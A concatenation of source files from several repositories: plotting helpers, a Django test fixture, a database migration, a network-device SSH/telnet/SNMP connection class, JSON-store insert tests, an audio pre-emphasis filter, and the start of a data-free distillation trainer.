    Labels are centred on the bar, 3 points above its top. The *coeff*
    parameter is currently unused (kept for interface compatibility).
    """
    for bar in rects:
        value = bar.get_height()
        # Centre of the bar along x; the label sits just above the bar top.
        x_centre = bar.get_x() + bar.get_width() / 2
        ax.annotate('{:.1f}%'.format(value * 100, prec=1),
                    xy=(x_centre, value),
                    xytext=(0, 3),  # 3 points vertical offset
                    textcoords="offset points",
                    ha='center', va='bottom', size=1.0)
def plot_weight_histograms(frequencies, names, name_to_save):
    """Plot a 5x4 grid of per-layer weight-value histograms, saved as EPS.

    frequencies:  sequence of 20 dicts mapping weight value -> count.
    names:        sequence of 20 layer names used as subplot titles.
    name_to_save: output path without the '.eps' extension.
    """
    fig, axes = plt.subplots(5, 4, figsize=(15, 10))
    fig.tight_layout()
    layer = 0
    for axis_row in axes:
        for axis in axis_row:
            plt.sca(axis)
            counts = list(frequencies[layer].values())
            values = np.array(list(frequencies[layer].keys()))
            # Bit width implied by the number of distinct values.
            bits_info = str(int(np.ceil(np.log2(len(values)))))
            if len(values) > 32:
                # Too many distinct values would clutter the subplot.
                counts = counts[:16]
                values = values[:16]
                bits_info += ' No plot'
            bars = plt.bar(values, width=0.75, height=counts)
            autolabel(bars, axis)
            plt.title(names[layer] + ' B' + bits_info, size=10)
            plt.xticks([], [])
            plt.yticks([], [])
            layer += 1
    plt.savefig(name_to_save + '.eps', format='eps')
    plt.close()
2ba20cdbe21eded23a10e339852b7da8fa1eb902 | 948 | py | Python | conftest.py | dasap89/rest_accounts | e0daeece000391d93e1bc99db484b8fe45588046 | [
"MIT"
] | null | null | null | conftest.py | dasap89/rest_accounts | e0daeece000391d93e1bc99db484b8fe45588046 | [
"MIT"
] | null | null | null | conftest.py | dasap89/rest_accounts | e0daeece000391d93e1bc99db484b8fe45588046 | [
"MIT"
] | null | null | null | """Additional configuration for pytest"""
import datetime
import os
import pytest
from django.contrib.auth import get_user_model
from rest_framework.authtoken.models import Token
User = get_user_model()
# pylint: disable=redefined-outer-name,unused-argument,no-member
@pytest.fixture(scope='session')
def django_db_setup(django_db_setup, django_db_blocker):
    """Seed the test database once per session.

    Overrides pytest-django's built-in ``django_db_setup`` fixture (hence
    the shadowing parameter name): after the standard setup runs, create
    one known user and its DRF auth token for all tests to share.
    """
    with django_db_blocker.unblock():
        user_one = User.objects.create_user(
            email='user_one@example.com',
            password='test_123'
        )
        Token.objects.create(user=user_one)
@pytest.mark.django_db
def get_token(email='user_one@example.com'):
    """Return the DRF token key for the user with the given *email*.

    :param email: e-mail address identifying the user
    :return: the ``key`` value of that user's Token object
    """
    owner = User.objects.get(email=email)
    # pylint: disable=no-member
    token = Token.objects.get(user_id=owner.id)
    return token.key
| 26.333333 | 64 | 0.714135 | 0 | 0 | 0 | 0 | 671 | 0.707806 | 0 | 0 | 355 | 0.374473 |
2ba38d92cac59d9afb0607dd598cb535e95a6b6e | 1,099 | py | Python | lib/rucio/db/sqla/migrate_repo/versions/35ef10d1e11b_change_index_on_table_requests.py | balrampariyarath/rucio | 8a68017af6b44485a9620566f1afc013838413c1 | [
"Apache-2.0"
] | 1 | 2017-08-07T13:34:55.000Z | 2017-08-07T13:34:55.000Z | lib/rucio/db/sqla/migrate_repo/versions/35ef10d1e11b_change_index_on_table_requests.py | pujanm/rucio | 355a997a5ea213c427a5d841ab151ceb01073eb4 | [
"Apache-2.0"
] | null | null | null | lib/rucio/db/sqla/migrate_repo/versions/35ef10d1e11b_change_index_on_table_requests.py | pujanm/rucio | 355a997a5ea213c427a5d841ab151ceb01073eb4 | [
"Apache-2.0"
] | 1 | 2021-06-17T14:15:15.000Z | 2021-06-17T14:15:15.000Z | """
Copyright European Organization for Nuclear Research (CERN)
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Authors:
- Vincent Garonne, <vincent.garonne@cern.ch>, 2014-2017
change index on table requests
Revision ID: 35ef10d1e11b
Revises: 3152492b110b
Create Date: 2014-06-20 09:01:52.704794
"""
from alembic.op import create_index, drop_index
# revision identifiers, used by Alembic.
revision = '35ef10d1e11b' # pylint:disable=invalid-name
down_revision = '3152492b110b' # pylint:disable=invalid-name
def upgrade():
    '''
    Replace the index on requests(request_type, state, created_at) with one
    on requests(request_type, state, updated_at): create the new index first,
    then drop the old one.
    '''
    create_index('REQUESTS_TYP_STA_UPD_IDX', 'requests', ["request_type", "state", "updated_at"])
    drop_index('REQUESTS_TYP_STA_CRE_IDX', 'requests')
def downgrade():
    '''
    Revert upgrade(): restore the index on requests(request_type, state,
    created_at) and drop the updated_at variant.
    '''
    create_index('REQUESTS_TYP_STA_CRE_IDX', 'requests', ["request_type", "state", "created_at"])
    drop_index('REQUESTS_TYP_STA_UPD_IDX', 'requests')
| 27.475 | 97 | 0.730664 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 872 | 0.793449 |
2ba3e284047fe1a855f0e6c487a5127e854e9da7 | 20,152 | py | Python | src/Connect.py | JurgenOS/net_node | 97f30263d7dd740f0eeeeb42f2555cab0bf2520e | [
"Apache-2.0"
] | 2 | 2021-04-05T08:26:05.000Z | 2021-04-05T08:26:10.000Z | src/Connect.py | JurgenOS/net_node | 97f30263d7dd740f0eeeeb42f2555cab0bf2520e | [
"Apache-2.0"
] | null | null | null | src/Connect.py | JurgenOS/net_node | 97f30263d7dd740f0eeeeb42f2555cab0bf2520e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import time
import re
import os
import paramiko
import telnetlib
from subprocess import run, PIPE, DEVNULL
from socket import socket, AF_INET, SOCK_STREAM
from multiprocessing.pool import ThreadPool as Pool
from src.ResponseParser import ResponseParser
from src.helpers.names_and_regex import HOST_NAME_REG
from src.helpers.ugly_charset import replace_ansi_char, convert_to_utf
from src.helpers.Errors import *
from pysnmp.hlapi import getCmd, SnmpEngine, CommunityData, \
UdpTransportTarget, ContextData, ObjectType, ObjectIdentity
class Connect(ResponseParser):
    def __init__(self, ip, log_dir):
        """Connection/scan state for one device at *ip*; logs go to *log_dir*."""
        super().__init__(ip, log_dir)
        # Live session object once logged in (paramiko channel or Telnet).
        self.connection: object = None
        # Preferred protocol chosen by scan_mng_protocols(): 'ssh' or 'telnet'.
        self.mng_protocol: str = ''
        # Per-protocol scan results ('SSH'/'SSHv1'/'Telnet'/... or '' if closed).
        self.ssh: str = ''
        self.telnet: str = ''
        self.http: str = ''
        self.https: str = ''
        # Seconds to wait for device output (raised by scan_mng_ports()).
        self.answer_delay: int = 10
        self.connection_timeout: int = 70
        # Timestamps like 'Nov 29 10:11:17'; empty string means unknown.
        self.date_of_last_ping: str = ''
        self.is_available: str = ''
def is_available_by_icmp(self):
res = ''
correct_answer = b"ttl="
command = "ping -c 2 {}".format(self.ip)
if 'win' in os.sys.platform.lower():
command = "ping -n 2 {}".format(self.ip)
response = run(command, shell=True, stdout=PIPE, stderr=DEVNULL)
if response.returncode == 0:
if correct_answer in response.stdout.lower():
self.logger.info(response.stdout.lower())
res = ' '.join(time.asctime().split()[1:-1])
self.is_available = res
else:
self.logger.info('not available')
return res
def scan_ports(self, *ports):
output = b''
result = []
for port in ports:
port = str(port)
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.settimeout(15)
try:
client_socket.connect((self.ip, port))
output += client_socket.recv(4096)
time.sleep(1)
output += client_socket.recv(4096)
if b'connection refused' in output or \
b'connection closed by remote host!' in output:
result.append('')
continue
except:
result.append('')
continue
client_socket.close()
result.append(output)
return result
def scan_port(self, port):
output = b''
port = int(port)
delay: int = 0
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.settimeout(10)
try:
start_time = time.time()
client_socket.connect((self.ip, port))
time.sleep(3)
output += client_socket.recv(4096)
if b'connection refused' in output or \
b'connection closed by remote host!' in output:
output = b''
delay = round(
time.time() - start_time
)
except:
delay = 0
output = b''
client_socket.close()
return port, output.decode('utf-8', 'ignore'), delay
    def scan_mng_ports(self):
        """
        Scan ports 22/23/80/443 in parallel and classify what answered.

        return a list in format:['SSH'|'SSHv1','Telnet', 'Http, 'Https', 'Vendor','Nov 29 10:11:17']
        Closed ports contribute '' in their slot. Also raises
        self.answer_delay to the slowest observed port delay.

        NOTE(review): port 22 may append zero or several entries (e.g. both
        'SSH-2.0' and 'SSH-1.99' checks can match), so the positional
        unpacking done by callers assumes exactly one match per port.
        """
        result = []
        vendor = ''
        res = []
        delay_list = []
        list_of_ports = [22, 23, 80, 443]
        # ===== multithreading =====
        # One worker thread per port; scan_port returns (port, banner, delay).
        worker = self.scan_port
        pool = Pool(4)
        res.extend(pool.map(worker, list_of_ports))
        pool.close()
        pool.join()
        # ===== for debug =====
        # for port in list_of_ports:
        #     res.append(self.scan_port(port))
        for item in res:
            port, response, delay = item
            delay_list.append(delay)
            if not response:
                # Closed/filtered port: keep the slot empty.
                result.append('')
                continue
            if port == 22:
                if 'SSH-2.0' in response:
                    result.append('SSH')
                if 'SSH-1.99' in response:
                    result.append('SSH')
                if 'SSH-1.5' in response:
                    result.append('SSHv1')
            if port == 23:
                result.append('Telnet')
            if port == 80:
                result.append('Http')
            if port == 443:
                result.append('Https')
            if not vendor:
                # First banner that yields a vendor name wins.
                vendor = self.find_vendor(response)
        # Slowest port sets the pace for subsequent command waits.
        self.answer_delay = max(delay_list)
        result.append(vendor)
        result.append(' '.join(time.asctime().split()[1:-1]))
        self.logger.info(result)
        return result
def scan_mng_protocols(self):
if not self.is_available_by_icmp():
raise NotAvailable
ssh, telnet, http, https, vendor, date = self.scan_mng_ports()
self.date_of_last_ping = date
self.telnet = telnet
self.ssh = ssh
self.http = http
self.https = https
if not self.vendor:
self.vendor = vendor
if telnet.lower() == 'telnet':
self.mng_protocol = 'telnet'
if ssh.lower() == 'ssh':
self.mng_protocol = 'ssh'
    def scan_snmp_system_info(self, snmp_community):
        """Fetch sysDescr.0 via SNMP, trying protocol versions 0..2 in turn.

        Raises FailedSnmpCommunity on request timeout; returns the pretty
        printed sysDescr varbind on success. Returns None implicitly when
        every version fails without a timeout.
        """
        snmp_version = 0
        while True:
            if snmp_version == 3:
                # All versions exhausted: fall through (returns None).
                break
            errorIndication, errorStatus, errorIndex, varBinds = next(
                getCmd(SnmpEngine(),
                       CommunityData(snmp_community, mpModel=snmp_version),
                       UdpTransportTarget(('{}'.format(self.ip), 161),
                                          timeout=2.0,
                                          retries=1),
                       ContextData(),
                       ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))
            )
            if errorIndication.__str__() =='No SNMP response received before timeout':
                raise FailedSnmpCommunity(snmp_community)
            # NOTE(review): this second timeout check is unreachable -- the
            # identical condition above already raised; confirm which of the
            # two behaviours (raise vs. try next version) was intended.
            if errorIndication.__str__() == 'No SNMP response received before timeout':
                snmp_version += 1
            if errorIndication:
                snmp_version += 1
            elif errorStatus:
                snmp_version += 1
            else:
                return varBinds[0].prettyPrint()
def send_short_commands(self, commands_str, log_out=False):
self.logger.critical('START')
list_of_commands = list(
map(
str.strip, commands_str.split('\n')
)
)
if self.mng_protocol.lower() == 'telnet':
res = self.send_command_via_telnet(list_of_commands, log_out=log_out)
else:
res = self.send_command_via_ssh(list_of_commands, log_out=log_out)
for line in res.split('\n'):
self.logger.critical(f'answers: {line.strip()}')
self.logger.critical('END')
return res
    def send_command_via_telnet(self, list_of_commands, log_out=False):
        """Send *list_of_commands* over the open Telnet session, one by one.

        Returns the accumulated, ANSI-stripped output with '\\n' line
        endings, or '' on any error (after attempting to re-login when the
        connection was lost). With log_out=True the session is assumed to
        end with the last command and '' is returned immediately after it.
        """
        res = ''
        output = ''
        answer = b''
        # to clear the output: flush whatever the device already printed.
        self.connection.write(b"\n")
        time.sleep(self.answer_delay)
        self.connection.read_very_eager()
        try:
            for line in list_of_commands:
                self.logger.critical(f'command: {line.strip()}')
                self.connection.write(line.encode('utf-8') + b'\n')
                time.sleep(int(self.answer_delay) * 2)
                answer = self.connection.read_very_eager()
                if not answer:
                    raise ConfigurationError(f'{line.strip()} has no answers')
                # replace ansi abra-cadabra like "\x1b[24;1H"
                answer = replace_ansi_char(answer)
                output += answer.decode('utf-8')
            # end execution in case of log out command
            if log_out:
                return ''
            # Return to the root prompt before collecting the final output.
            self.connection.write(self.command_to_root.encode('utf-8')) # ^Z == b"\x1A"
            time.sleep(self.answer_delay)
            self.connection.write('\n'.encode("utf-8"))
            # to get full command response: keep nudging with empty lines
            # until the prompt (hostname) re-appears on the last line.
            start_time = time.time()
            while True:
                answer = b''
                self.connection.write('\n'.encode("utf-8"))
                if time.time() - start_time > 60:
                    raise ConfigurationError(f'to long output waiting.'
                                             f'Output: "{output}"')
                self.connection.write('\n'.encode("utf-8"))
                answer += self.connection.read_very_eager()
                if answer:
                    # replace abra-cadabra like "\x1b[24;1H"
                    answer = replace_ansi_char(answer)
                    output += convert_to_utf(answer)
                    # Prompt on the last line means the device is done.
                    if re.search(HOST_NAME_REG, answer.split(b'\n')[-1].strip()):
                        break
                time.sleep(self.answer_delay)
            for line in re.split('\r\n|\n', output):
                res += line + '\n'
            return res
        except Exception as e:
            self.logger.critical(e.__str__())
            self.logger.exception(e.__str__())
            # Try to restore the session only when it was actually lost.
            if not self.connection:
                self._log_in()
            return ''
    def send_command_via_ssh(self, list_of_commands, log_out=False):
        """Send *list_of_commands* over the open SSH channel, one by one.

        Returns the accumulated, ANSI-stripped output with '\\n' line
        endings, or '' on any error. Mikrotik devices get a doubled wait at
        every step. With log_out=True and a closed channel, '' is returned
        right after the commands.
        """
        res = ''
        output = ''
        # to clear the output: flush whatever the device already printed.
        self.connection.send(self.command_line_break.encode('utf-8'))
        time.sleep(self.answer_delay)
        if self.vendor.lower() == 'mikrotik':
            time.sleep(self.answer_delay)
        self.connection.recv(65000)
        try:
            # send command one by one
            for line in list_of_commands:
                self.logger.critical(f'command: {line.strip()}')
                self.connection.send(line.encode('utf-8') + self.command_line_break.encode('utf-8'))
                time.sleep(self.answer_delay)
                if self.vendor.lower() == 'mikrotik':
                    time.sleep(self.answer_delay)
                output_bin = self.connection.recv(65000)
                # replace ansi abra-cadabra like "\x1b[24;1H"
                output_bin = replace_ansi_char(output_bin)
                output += convert_to_utf(output_bin)
                if not output:
                    raise ConfigurationError(f'{line.strip()} has no answers')
            # end execution in case of log out command
            if 'closed' in self.connection.__str__() and log_out:
                return ''
            # return to root
            self.connection.send(self.command_to_root.encode('utf-8')) # ^Z == b"\x1A"
            time.sleep(self.answer_delay)
            if self.vendor.lower() == 'mikrotik':
                time.sleep(self.answer_delay)
            self.connection.send(self.command_line_break.encode('utf-8'))
            # to get full command response: keep nudging until the prompt
            # (hostname) re-appears on the last received line.
            start_time = time.time()
            while True:
                answer = b''
                out = b''
                if time.time() - start_time > 60:
                    raise ConfigurationError(f'to long output waiting.'
                                             f'Output: "{output}"')
                # send empty line
                # NOTE(review): `line` is still bound to the LAST command from
                # the for-loop above, so this actually re-sends that command
                # rather than an empty line -- confirm intent.
                self.connection.send(line.encode('utf-8') + self.command_line_break.encode('utf-8'))
                time.sleep(self.answer_delay)
                if self.vendor.lower() == 'mikrotik':
                    time.sleep(self.answer_delay)
                # get response
                answer += self.connection.recv(65000)
                if answer:
                    # replace ansi abra-cadabra like "\x1b[24;1H"
                    clear_answer = replace_ansi_char(answer)
                    output += clear_answer.decode('utf-8')
                    # Prompt on the last line means the device is done.
                    if re.search(
                        HOST_NAME_REG, re.split(b'\r|\n|\r\n|\n\r', clear_answer)[-1].strip()
                    ):
                        break
                time.sleep(self.answer_delay)
                continue
            for line in re.split('\r\n|\n', output):
                res += line + '\n'
            return res
        except Exception as e:
            self.logger.critical(e.__str__())
            self.logger.exception(e.__str__())
            # Try to restore the session only when it was actually lost.
            if not self.connection:
                self._log_in()
            return ''
    def get_show_command_output(self, command):
        """Run a single 'show'-style command and return its cleaned output.

        The raw output is scanned line by line: everything between the echoed
        command and the next hostname-prompt line is collected.  Exactly one
        distinct hostname line is expected across the whole output; more (or
        none with non-empty output) indicates the response was garbled.

        :param command: CLI command to execute on the device.
        :return: cleaned command output as a string ('' when not connected).
        :raises NotSingleHostnameFound: when != 1 distinct hostname lines seen.
        :raises NotClearOutput: when raw output exists but nothing was extracted.
        """
        host_names_set: set = set()  # sanity check: must end up with exactly 1 entry
        if not self.connection:
            self.logger.critical('no connection')
            return ''
        output = self.send_short_commands(command)
        clear_result = ''
        start = False  # True while we are between the echoed command and the next prompt
        for line in map(str.strip, output.split('\n')):
            if not line:
                continue
            if command.strip() in line:
                # echoed command marks the beginning of the useful output
                start = True
                continue
            if re.search(HOST_NAME_REG.decode('utf-8'), line):
                # sometimes name of version may there be in line line "[V200R005C20SPC200]",
                # net_node look at this like hostname.
                # To eliminate this
                if [x for x in self.releases_list if x.lower().strip() in line.lower().strip()]:
                    continue
                # if self.release.lower() in line.lower() and self.vendor.lower() == 'huawei':
                #
                #     continue
                host_names_set.add(line)
                start = False  # prompt line terminates the command's output
            if start:
                clear_result += line + '\n'
        if len(host_names_set) != 1:
            raise NotSingleHostnameFound(f'ERROR: find more than 1 hostname_lines {host_names_set}')
        if output and not clear_result:
            raise NotClearOutput(f'ERROR: len of row output: {len(output)} and no clear_result')
        return clear_result
    def login_via_telnet(self):
        """Log into the device over telnet (port 23).

        Handles an optional "Press any key to continue" banner, waits for one
        of several known username prompts, then sends credentials.  Success is
        detected by finding a hostname-prompt line in the post-password output.

        :return: connected telnetlib.Telnet object, or None on any failure.
        """
        answer = b''
        try:
            tn = telnetlib.Telnet(self.ip, 23, self.answer_delay + 10)
            try:
                # some devices show a banner before the login prompt
                exp = tn.expect([b"Press any key to continue"], timeout=2)
                if exp[1]:
                    answer += exp[2]
                    tn.write(b'1\n')
                    time.sleep(self.answer_delay)
            # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit
            except:
                pass
            try:
                # vendor-specific username prompt variants
                exp = tn.expect(
                    [b"Username: ",
                     b"login: ",
                     b"login as: ",
                     b"Username:",
                     b"username:",
                     b"username: ",
                     b"login:",
                     b"UserName:",
                     b"Tacacs UserName:",
                     b"Radius UserName:"],
                    timeout=self.answer_delay)
                if exp[1]:
                    answer += exp[2]
                    tn.write(self.user.encode("utf-8") + b"\n")
                    time.sleep(self.answer_delay + 10)
            except:
                self.logger.critical('no "Username:" string')
            finally:
                # the password is sent even when no username prompt was seen —
                # presumably for devices that ask for a password only
                tn.write(self.password.encode("utf-8") + b"\n")
                time.sleep(self.answer_delay)
                password_string = replace_ansi_char(tn.read_very_eager())
                answer += password_string
                find = False
                # a hostname prompt after the password means login succeeded
                for line in password_string.split(b'\n'):
                    if re.search(HOST_NAME_REG, line.strip()): find = True
                if not find:
                    raise ConnectionRefusedError('HOST_NAME_REG was not find after credentials was sent')
            answer += tn.read_very_eager()
            # parse vendor/OS/version info out of the login banner
            self.find_info(replace_ansi_char(answer).decode('utf-8'))
            self.logger.critical('SUCCESS')
            return tn
        except Exception as e:
            self.logger.critical(e.__str__())
            self.logger.exception(e.__str__())
            return
def login_via_ssh(self):
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=self.ip,
username=self.user,
password=self.password,
look_for_keys=False,
allow_agent=False,
timeout=self.connection_timeout,
banner_timeout=70)
ssh = client.invoke_shell()
ssh.timeout = self.connection_timeout
time.sleep(self.answer_delay)
self.logger.critical('SUCCESS')
return ssh
except paramiko.ssh_exception.SSHException as e:
if 'Incompatible ssh server' in e.__str__() or \
'Negotiation failed.' in e.__str__() or \
'Bad authentication type' in e.__str__() and self.telnet:
self.logger.critical('ssh corrupted version, manage protocol switch to telnet')
self.mng_protocol = 'telnet'
return self.login_via_telnet()
except:
self.logger.critical('error')
self.logger.exception('error')
    def _log_in(self):
        """
        return connected_object

        Picks (or scans for) a management protocol, connects, and then makes
        sure device info (vendor/os/image/release/platform) is populated,
        falling back to an explicit info command when the login banner was not
        enough.  Raises NoConnection when neither protocol yields a session.
        """
        answer_string = b''
        if not self.mng_protocol:
            self.scan_mng_protocols()
            if not self.mng_protocol:
                raise NotMngProtocol('no ssh no telnet')
        if self.mng_protocol.lower() == 'ssh':
            self.connection = self.login_via_ssh()
        elif self.mng_protocol.lower() == 'telnet':
            self.connection = self.login_via_telnet()
        if self.connection:
            # for telnet get_info executed in "login_via_telnet" section
            if self.mng_protocol.lower() == 'ssh':
                # NOTE(review): busy-wait with no timeout — hangs forever if the
                # channel never becomes readable; consider a deadline.
                while True:
                    if self.connection.recv_ready():
                        break
                self.connection.send(self.command_line_break)
                time.sleep(self.answer_delay)
                # mikrotik devices answer slowly, so wait twice as long
                if self.vendor.lower() == 'mikrotik':
                    time.sleep(self.answer_delay)
                answer_string = self.connection.recv(65000)
                answer_string = replace_ansi_char(answer_string).decode('utf-8')
                self.find_info(answer_string)
                # banner was not enough — ask the device explicitly
                if not (
                        self.vendor and
                        self.os and
                        self.image_name and
                        self.image_version and
                        self.release and
                        self.platform
                ):
                    self.find_info(
                        self.send_short_commands(
                            self.command_info
                        )
                    )
                    self.send_short_commands(
                        self.command_screen_length_disable
                    )
            # NOTE(review): this repeats the guarded block above at the outer
            # level (covers the telnet path); the "if not" guard makes the
            # second pass a no-op when everything is already populated.
            if not (
                    self.vendor and
                    self.os and
                    self.image_name and
                    self.image_version and
                    self.release and
                    self.platform
            ):
                self.find_info(
                    self.send_short_commands(
                        self.command_info
                    )
                )
                self.send_short_commands(
                    self.command_screen_length_disable
                )
        else:
            raise NoConnection
def log_out(self):
if not self.connection:
self.logger.critical('no connection')
return False
logout_command = self.command_logout
if self.mng_protocol.lower() == 'telnet':
logout_command = logout_command
try:
self.send_short_commands(logout_command, log_out=True)
time.sleep(10)
self.connection.close()
self.connection = None
except Exception as e:
self.logger.exception(e.__str__())
self.logger.critical('SUCCESS')
| 28.954023 | 105 | 0.507394 | 19,586 | 0.971913 | 0 | 0 | 0 | 0 | 0 | 0 | 2,715 | 0.134726 |
2ba537585718a0a24f20f73225113ab2e26600eb | 3,472 | py | Python | test/test_insert_documents.py | ShaneKilkelly/bedquilt | beaee513a015ed0dd633b738517b33eb7c4c42a3 | [
"MIT"
] | 288 | 2015-04-20T18:14:39.000Z | 2021-10-30T01:35:44.000Z | test/test_insert_documents.py | ShaneKilkelly/bedquilt | beaee513a015ed0dd633b738517b33eb7c4c42a3 | [
"MIT"
] | 21 | 2015-04-13T12:48:40.000Z | 2017-05-27T12:41:10.000Z | test/test_insert_documents.py | ShaneKilkelly/bedquilt | beaee513a015ed0dd633b738517b33eb7c4c42a3 | [
"MIT"
] | 19 | 2015-11-03T09:25:00.000Z | 2021-05-01T00:28:02.000Z | import testutils
import json
import string
import psycopg2
class TestInsertDocument(testutils.BedquiltTestCase):
    """Integration tests for the bq_insert stored procedure.

    NOTE(review): most tests interpolate JSON into SQL with str.format; only
    test_with_single_quotes_in_field uses parameterized execution, which is
    why it alone survives embedded quotes.  Also uses the Python-2-only
    ``unicode`` builtin below — this suite will not run on Python 3 as-is.
    """
    def test_insert_into_non_existant_collection(self):
        # inserting into a missing collection should create it implicitly
        doc = {
            "_id": "user@example.com",
            "name": "Some User",
            "age": 20
        }
        self.cur.execute("""
        select bq_insert('people', '{}');
        """.format(json.dumps(doc)))
        result = self.cur.fetchone()
        self.assertEqual(
            result, ('user@example.com',)
        )
        self.cur.execute("select bq_list_collections();")
        collections = self.cur.fetchall()
        self.assertIsNotNone(collections)
        self.assertEqual(collections, [("people",)])
    def test_with_non_string_id(self):
        # every non-string _id variant must be rejected server-side
        docs = [
            {
                "_id": 42,
                "name": "Penguin",
                "age": "penguin@example.com"
            },
            {
                "_id": ['derp'],
                "name": "Penguin",
                "age": "penguin@example.com"
            },
            {
                "_id": {"name": "Penguin"},
                "age": "penguin@example.com"
            },
            {
                "_id": False,
                "name": "Penguin",
                "age": "penguin@example.com"
            },
            {
                "_id": None,
                "name": "Penguin",
                "age": "penguin@example.com"
            }
        ]
        for doc in docs:
            with self.assertRaises(psycopg2.InternalError):
                self.cur.execute("""
                select bq_insert('people', '{}');
                """.format(json.dumps(doc)))
                self.conn.rollback()
    def test_insert_without_id(self):
        # server should generate a 24-char hex object id when none is supplied
        doc = {
            "name": "Some User",
            "age": 20
        }
        self.cur.execute("""
        select bq_insert('people', '{}');
        """.format(json.dumps(doc)))
        result = self.cur.fetchone()
        self.assertIsNotNone(result)
        self.assertEqual(type(result), tuple)
        self.assertEqual(len(result), 1)
        _id = result[0]
        # NOTE(review): `unicode` exists only on Python 2
        self.assertIn(type(_id), {str, unicode})
        self.assertEqual(len(_id), 24)
        for character in _id:
            self.assertIn(character, string.hexdigits)
    def test_with_single_quotes_in_field(self):
        # parameterized execute, so the embedded apostrophe is handled safely
        doc = {
            "description": "Something I've eaten"
        }
        self.cur.execute("""
        select bq_insert('things', %s);
        """, (json.dumps(doc),))
        result = self.cur.fetchone()
        self.assertIsNotNone(result)
    def test_insert_with_repeat_id(self):
        # a duplicate _id must violate the unique constraint, and the failed
        # insert must not leave an extra row behind
        doc = {
            "_id": "user_one",
            "name": "Some User",
            "age": 20
        }
        self.cur.execute("""
        select bq_insert('people', '{}');
        """.format(json.dumps(doc)))
        result = self.cur.fetchone()
        self.assertIsNotNone(result)
        self.assertEqual(type(result), tuple)
        self.assertEqual(len(result), 1)
        _id = result[0]
        self.assertEqual(_id, "user_one")
        self.conn.commit()
        with self.assertRaises(psycopg2.IntegrityError):
            self.cur.execute("""
            select bq_insert('people', '{}');
            """.format(json.dumps(doc)))
        self.conn.rollback()
        self.cur.execute("select count(*) from people;")
        result = self.cur.fetchone()
        self.assertEqual(result, (1,))
| 27.338583 | 59 | 0.489343 | 3,410 | 0.982143 | 0 | 0 | 0 | 0 | 0 | 0 | 852 | 0.245392 |
2ba5755aba035a21c8456b8d1f629b971c609de8 | 734 | py | Python | pywizard/PreEmphasizer.py | sintech/python_wizard | 397cac3abc2b74bc20a0ca202e3df0d990730dd4 | [
"MIT"
] | 28 | 2017-10-08T14:41:17.000Z | 2022-01-21T09:09:31.000Z | pywizard/PreEmphasizer.py | sintech/python_wizard | 397cac3abc2b74bc20a0ca202e3df0d990730dd4 | [
"MIT"
] | 17 | 2017-10-29T20:35:19.000Z | 2022-03-09T10:01:55.000Z | pywizard/PreEmphasizer.py | sintech/python_wizard | 397cac3abc2b74bc20a0ca202e3df0d990730dd4 | [
"MIT"
] | 12 | 2017-11-14T12:37:39.000Z | 2022-01-20T20:38:08.000Z | from pywizard.userSettings import settings
import scipy as sp
class PreEmphasizer(object):
    """First-order pre-emphasis filter for sample buffers.

    Applies y[i] = x[i] + alpha * x[i-1] (the first sample is kept as-is)
    and then rescales the buffer so its total energy is unchanged.
    """

    @classmethod
    def processBuffer(cls, buf):
        """Pre-emphasize ``buf.samples`` in place, preserving total energy.

        :param buf: buffer object exposing ``samples`` (numpy array) and
                    ``energy()``.
        """
        preEnergy = buf.energy()
        alpha = cls.alpha()
        # (removed unused locals unmodifiedPreviousSample / tempSample)
        first_sample = buf.samples[0]
        # y[i] = x[i] + alpha * x[i-1]
        buf.samples = buf.samples[1:] + (buf.samples[:-1] * alpha)
        # scipy's top-level insert/sqrt aliases were removed in modern SciPy;
        # use the numpy originals instead
        buf.samples = np.insert(buf.samples, 0, first_sample)
        cls.scaleBuffer(buf, preEnergy, buf.energy())

    @classmethod
    def alpha(cls):
        """Filter coefficient, taken from user-configurable settings."""
        return settings.preEmphasisAlpha

    @classmethod
    def scaleBuffer(cls, buf, preEnergy, postEnergy):
        """Rescale ``buf.samples`` so post-filter energy matches preEnergy."""
        scale = np.sqrt(preEnergy / postEnergy)
        buf.samples *= scale
| 24.466667 | 66 | 0.644414 | 668 | 0.910082 | 0 | 0 | 623 | 0.848774 | 0 | 0 | 0 | 0 |
2ba6cae52049d7f6aac58f13b91780ebbd646035 | 3,528 | py | Python | model_measuring/kamal/slim/distillation/data_free/zskt.py | Gouzhong1223/Dubhe | 8959a51704410dc38b595a0926646b9928451c9a | [
"Apache-2.0"
] | 1 | 2022-01-11T07:14:37.000Z | 2022-01-11T07:14:37.000Z | model_measuring/kamal/slim/distillation/data_free/zskt.py | Gouzhong1223/Dubhe | 8959a51704410dc38b595a0926646b9928451c9a | [
"Apache-2.0"
] | 1 | 2022-03-04T07:19:43.000Z | 2022-03-04T07:19:43.000Z | model_measuring/kamal/slim/distillation/data_free/zskt.py | Gouzhong1223/Dubhe | 8959a51704410dc38b595a0926646b9928451c9a | [
"Apache-2.0"
] | 1 | 2022-03-20T13:09:14.000Z | 2022-03-20T13:09:14.000Z | """
Copyright 2020 Tianshu AI Platform. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=============================================================
"""
import torch
import time
import torch.nn.functional as F
from kamal.slim.distillation.kd import KDDistiller
from kamal.utils import set_mode
from kamal.core.tasks.loss import kldiv
class ZSKTDistiller(KDDistiller):
    """Zero-Shot Knowledge Transfer distiller.

    A generator produces synthetic inputs that maximize teacher/student
    disagreement (adversarial step); the student is then trained to match
    the teacher on those same inputs.  No real training data is used.
    """
    def __init__( self,
                  student,
                  teacher,
                  generator,
                  z_dim,
                  logger=None,
                  viz=None):
        # z_dim: shape of the latent noise vector fed to the generator
        super(ZSKTDistiller, self).__init__(logger, viz)
        self.teacher = teacher
        self.model = self.student = student
        self.generator = generator
        self.z_dim = z_dim
    def train(self, start_iter, max_iter, optim_s, optim_g, device=None):
